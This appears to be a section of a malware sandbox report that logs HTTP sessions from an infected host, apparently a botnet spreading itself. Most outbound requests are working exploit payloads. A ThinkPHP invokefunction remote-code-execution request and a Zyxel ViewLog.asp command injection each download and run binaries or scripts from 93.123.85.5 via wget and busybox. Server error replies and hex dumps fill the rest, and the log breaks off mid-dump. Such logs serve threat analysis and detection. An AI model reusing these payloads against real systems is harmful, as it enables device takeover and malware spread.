                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              143192.168.2.235433688.218.157.21980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.301534891 CET3832OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:30.642179012 CET3844INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Fri, 10 Aug 2018 00:40:50 GMT
                                                              Server: lighttpd/1.4.39
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                              Nov 13, 2023 22:18:30.825594902 CET3931INHTTP/1.0 400 Bad Request
                                                              Content-Type: text/html
                                                              Content-Length: 349
                                                              Connection: close
                                                              Date: Fri, 10 Aug 2018 00:40:50 GMT
                                                              Server: lighttpd/1.4.39
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              144192.168.2.235352294.23.88.178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.331301928 CET3834OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              145192.168.2.235990685.122.54.1508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.363580942 CET3834OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              146192.168.2.234645431.136.93.1448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.369021893 CET3835OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.377425909 CET3965OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:33.361258984 CET4206OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:37.392585993 CET4677OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.327636003 CET5633OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:01.197554111 CET7576OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.473119974 CET11648OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              147192.168.2.235291062.72.194.1518080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.370487928 CET3836OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.377404928 CET3965OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:33.361258984 CET4206OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              148192.168.2.234692494.120.3.2108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.371586084 CET3836OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              149192.168.2.234158831.200.111.1298080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.376938105 CET3837OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              15192.168.2.2342820112.125.160.16380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.531399012 CET440OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:01.857192993 CET547INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:04 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              150192.168.2.234219294.230.157.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.380812883 CET3838OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:30.734107018 CET3930INHTTP/1.0 404 R
                                                              Content-Type: text/html
                                                              Data Raw: 4e 6f 20 43 47 49
                                                              Data Ascii: No CGI


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              151192.168.2.234838094.123.191.1678080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.383563042 CET3838OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              152192.168.2.235840294.123.253.2418080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.385951996 CET3839OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              153192.168.2.235463495.108.44.1478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.405729055 CET3840OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              154192.168.2.233988294.70.217.1708080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.423516989 CET3841OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              155192.168.2.234926488.209.206.23080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:30.629748106 CET3843OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:32.109810114 CET4074INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:18:30 GMT
                                                              Server: Apache/2.2.15 (CentOS)
                                                              Last-Modified: Mon, 23 Oct 2023 13:43:55 GMT
                                                              ETag: "bf4d9-581-6086269d68042"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 1409
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 